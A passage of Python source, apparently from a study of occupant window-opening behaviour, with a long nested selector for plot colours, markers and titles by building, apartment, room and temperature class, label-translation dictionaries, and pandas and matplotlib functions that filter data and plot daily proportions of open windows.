labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,Level3,"allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,Level3,Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,Level3,Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,Level3,Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,Level3,Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,Level3,Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,Level3,Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
else:
print ("ERROR: Auswahl Level3 nicht korrekt")
else:
print ("ERROR: Auswahl Level2 nicht eindeutig")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level0 == None:
print ("Alle Linien, also T0 ..... T5")
if Level2 in CheckEntrances:
#print Level2
if Level3 == "-":
#print "mean alle Apartments"
if Level4 == '-':
#print "mean alle Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,"meanApartments", Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
elif Level3 in CheckApartments:
#print Level3
if Level4 == '-':
#print "mean alle Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3, "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3, "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3, "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3, "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3, "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3, "meanRooms", Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3,Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3,Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3,Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3,Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3,Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
##print Level5
colorList = colorsTemperature
markerList = markersTemperature
title = [Level2,Level3,Level4, Level5]
labels = CheckTemperatures
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
else:
print ("ERROR: Auswahl Level3 nicht korrekt")
else:
print ("ERROR: Auswahl Level2 nicht eindeutig")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level0 in ["T1","T2","T3","T4","T5"]:
if Level2 in CheckEntrances:
if Level3 == "-":
if Level4 == "-":
if Level5 == "WP1":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments","meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments","meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments","meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments","meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments","meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments","meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
if Level5 == "WP1":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments",Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments",Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments",Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments",Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments",Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,"meanApartments",Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
elif Level3 in CheckApartments:
if Level4 == "-":
if Level5 == "WP1":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,"meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,"meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,"meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,"meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,"meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,"meanRooms",Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
if Level5 == "WP1":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
title = [Level2,Level3,Level4,Level5]
labels = ["T0",Level0]
selctionStrings = [["T0",Level0],Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
else:
print ("ERROR: Auswahl Level3 nicht korrekt")
else:
print ("ERROR: Auswahl Level2 nicht eindeutig")
else:
print ("ERROR: Auswahl Level0[0] nicht eindeutig")
print ("Ende SelectAnalysisFunction")
def english2German(titleList,labelList):
translateDictonary ={"B2E1":"R2E1",
"B2E2":"R2E2",
"B2E3":"R2E3",
"B3E1":"R3E1",
"B3E2":"R3E2",
"B3E2":"R3E3",
"allBuildings": "Gebaeude",
"meanApartment": "Durchschnitt Wohnung",
"allApartments": "Wohnung",
"Room_Sleeping":"Schlafzimmer",
"Room_Kitchen": u"Kueche",
"Room_Children": "Kinderzimmer",
"Room_Living": "Wohnzimmer",
"Room_Bath": "Badezimmer",
"allRooms": "Zimmer",
"meanRooms": "Durchschnitt Zimmer",
"T0": "ATR",
"T1": 'DAT $\leq$ 5',
"T2": "5 $\leq$ DAT $\leq$ 11",
"T3": "11 $\leq$ DAT $\leq$ 14",
"T4": "14 $\leq$ DAT $\leq$ 18",
"T5": "DAT $\geq$ 18",
"-":"Durschnitt"}
new_titleList = []
for titleComponent in titleList:
pass
if titleComponent in translateDictonary.keys():
new_titleList.append(translateDictonary.get(titleComponent))
else:
new_titleList.append(titleComponent)
new_labelList = []
for labelComponent in labelList:
if labelComponent in translateDictonary.keys():
new_labelList.append(translateDictonary.get(labelComponent))
else:
new_labelList.append(labelComponent)
return new_titleList, new_labelList
def codifyL1(codeList):
if isinstance(codeList[0], type(None)):
return codeList
else:
codeListZ=codeList[0]
translateDictonary={'T0':'ATR',
'T1':'5 < AT Daily Average',
'T2':'5 < AT Daily Average <= 11',
'T3':'1 < AT Daily Average <= 14',
'T4':'14 < AT Daily Average <= 18',
'T5':'18 < AT Daily Average'}
if isinstance(codeListZ, basestring): codeListZ=[codeListZ]
new_codeList = []
for titleComponent in codeListZ:
pass
if titleComponent in translateDictonary.keys():
new_codeList.append(translateDictonary.get(titleComponent))
else:
new_codeList.append(titleComponent)
codeList[0]=new_codeList[0]
print (new_codeList[0])
return codeList
def english2English(titleList,labelList):
translateDictonary ={"B2E1":"B2E1",
"B2E2":"B2E2",
"B2E3":"B2E3",
"B3E1":"B3E1",
"B3E2":"B3E2",
"B3E2":"B3E3",
"allBuildings": "all buildings",
"meanApartments": "Mean Apartment",
"allApartments": "all Apartments",
"Room_Sleeping":"Sleeping room",
"Room_Kitchen": "Kitchen",
"Room_Children": "Children room",
"Room_Living": "Living room",
"Room_Bath": "Bathroom",
"allRooms": "all Rooms",
"meanRooms": "Mean roooms",
"T0": "ATR",
"T1": 'DAT $\leq$ 5',
"T2": "5 $\leq$ DAT $\leq$ 11",
"T3": "11 $\leq$ DAT $\leq$ 14",
"T4": "14 $\leq$ DAT $\leq$ 18",
"T5": "DAT $\geq$ 18",
"-":"Average"}
new_titleList = []
for titleComponent in titleList:
pass
if titleComponent in translateDictonary.keys():
new_titleList.append(translateDictonary.get(titleComponent))
else:
new_titleList.append(titleComponent)
new_labelList = []
for labelComponent in labelList:
if labelComponent in translateDictonary.keys():
new_labelList.append(translateDictonary.get(labelComponent))
else:
new_labelList.append(labelComponent)
return new_titleList, new_labelList
def readDF(df1=pd.DataFrame(),df2=pd.DataFrame(),df3=pd.DataFrame(),df4=pd.DataFrame(),df5=pd.DataFrame(),df6=pd.DataFrame(),level0='ATR',level1='Standard Diurnal',level2='MD',level3='B2E1',level4='A01',level5='Room_Living',level6="WP1"):
levels=[level0,level1,level2,level3,level4,level5,level6]
print (levels)
if not df1.empty:
for levelNr,level in enumerate(levels):
if level!=None: df1=df1.iloc[:,df1.columns.get_level_values(levelNr)==level]
if not df2.empty:
for levelNr,level in enumerate(levels):
if level!=None: df2=df2.iloc[:,df2.columns.get_level_values(levelNr)==level]
if not df3.empty:
for levelNr,level in enumerate(levels):
if level!=None: df3=df3.iloc[:,df3.columns.get_level_values(levelNr)==level]
if not df4.empty:
for levelNr,level in enumerate(levels):
if level!=None: df4=df4.iloc[:,df4.columns.get_level_values(levelNr)==level]
if not df5.empty:
for levelNr,level in enumerate(levels):
if level!=None: df5=df5.iloc[:,df5.columns.get_level_values(levelNr)==level]
if not df6.empty:
for levelNr,level in enumerate(levels):
if level!=None: df6=df6.iloc[:,df6.columns.get_level_values(levelNr)==level]
print ("COls: {}".format(df1.columns))
# if level0!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(0)==level0]
# df2=df2.iloc[:,df2.columns.get_level_values(0)==level0]
# df3=df3.iloc[:,df3.columns.get_level_values(0)==level0]
# df4=df4.iloc[:,df4.columns.get_level_values(0)==level0]
# df5=df5.iloc[:,df5.columns.get_level_values(0)==level0]
# df6=df6.iloc[:,df6.columns.get_level_values(0)==level0]
# if level1!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(1)==level1]
# df2=df2.iloc[:,df2.columns.get_level_values(1)==level1]
# df3=df3.iloc[:,df3.columns.get_level_values(1)==level1]
# df4=df4.iloc[:,df4.columns.get_level_values(1)==level1]
# df5=df5.iloc[:,df5.columns.get_level_values(1)==level1]
# df6=df6.iloc[:,df6.columns.get_level_values(1)==level1]
# if level2!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(2)==level2]
# df2=df2.iloc[:,df2.columns.get_level_values(2)==level2]
# df3=df3.iloc[:,df3.columns.get_level_values(2)==level2]
# df4=df4.iloc[:,df4.columns.get_level_values(2)==level2]
# df5=df5.iloc[:,df5.columns.get_level_values(2)==level2]
# df6=df6.iloc[:,df6.columns.get_level_values(2)==level2]
# if level3!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(3)==level3]
# df2=df2.iloc[:,df2.columns.get_level_values(3)==level3]
# df3=df3.iloc[:,df3.columns.get_level_values(3)==level3]
# df4=df4.iloc[:,df4.columns.get_level_values(3)==level3]
# df5=df5.iloc[:,df5.columns.get_level_values(3)==level3]
# df6=df6.iloc[:,df6.columns.get_level_values(3)==level3]
# if level4!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(4)==level4]
# df2=df2.iloc[:,df2.columns.get_level_values(4)==level4]
# df3=df3.iloc[:,df3.columns.get_level_values(4)==level4]
# df4=df4.iloc[:,df4.columns.get_level_values(4)==level4]
# df5=df5.iloc[:,df5.columns.get_level_values(4)==level4]
# df6=df6.iloc[:,df6.columns.get_level_values(4)==level4]
# if level5!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(5)==level5]
# df2=df2.iloc[:,df2.columns.get_level_values(5)==level5]
# df3=df3.iloc[:,df3.columns.get_level_values(5)==level5]
# df4=df4.iloc[:,df4.columns.get_level_values(5)==level5]
# df5=df5.iloc[:,df5.columns.get_level_values(5)==level5]
# df6=df6.iloc[:,df6.columns.get_level_values(5)==level5]
# if level6!=None:
# df1=df1.iloc[:,df1.columns.get_level_values(6)==level6]
# df2=df2.iloc[:,df2.columns.get_level_values(6)==level6]
# df3=df3.iloc[:,df3.columns.get_level_values(6)==level6]
# df4=df4.iloc[:,df4.columns.get_level_values(6)==level6]
# df5=df5.iloc[:,df5.columns.get_level_values(6)==level6]
# df6=df6.iloc[:,df6.columns.get_level_values(6)==level6]
print ("Ende readDF")
def plotDiurnal(df,df2, labels=[],levels=[],timeType='Standard Diurnal',dataType='MD',title=None,colors=None):
if levels[0]!=None:
df=df.iloc[:,df.columns.get_level_values(0)==levels[0]]
df2=df2.iloc[:,df2.columns.get_level_values(0)==levels[0]]
if timeType!=None:
df=df.iloc[:,df.columns.get_level_values(1)==timeType]
df2=df2.iloc[:,df2.columns.get_level_values(1)==timeType]
if dataType!=None:
df=df.iloc[:,df.columns.get_level_values(2)==dataType]
df2=df2.iloc[:,df2.columns.get_level_values(2)==dataType]
if levels[1]!=None:
df=df.iloc[:,df.columns.get_level_values(3)==levels[1]]
df2=df2.iloc[:,df2.columns.get_level_values(3)==levels[1]]
if levels[2]!=None:
df=df.iloc[:,df.columns.get_level_values(4)==levels[2]]
df2=df2.iloc[:,df2.columns.get_level_values(4)==levels[2]]
if levels[3]!=None:
df=df.iloc[:,df.columns.get_level_values(5)==levels[3]]
df2=df2.iloc[:,df2.columns.get_level_values(5)==levels[3]]
if levels[4]!=None:
df=df.iloc[:,df.columns.get_level_values(6)==levels[4]]
df2=df2.iloc[:,df2.columns.get_level_values(6)==levels[4]]
fig = plt.figure(figsize=(16./2.54, 10/2.54))
fig.subplots_adjust(left=0.1)
gs1 = gridspec.GridSpec(1, 1)
#ax = plt.subplot(gs1[0, :])
ax = plt.axes([0.1, 0.1, .85, .8])
for index,column in enumerate(df.columns.values):
if index!=10: ax.plot(df.index, df[column], colors[index], linewidth=2.0,label=labels[index],alpha=0.4)
for index,column in enumerate(df2.columns.values):
if index!=10: ax.plot(df.index, df2[column], colors[index], marker="x", linewidth=0.7,markevery=60,mfc='None', mec=colors[index],label=labels[index]+' Sim')
ax.set_ylabel("Proportion of windows open")
ax.set_xlabel("Time of the day")
ticks = ax.get_xticks()
ax.set_ylim(0,1)
plt.title(title, y=1.05)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.32,
box.width, box.height * 0.68])
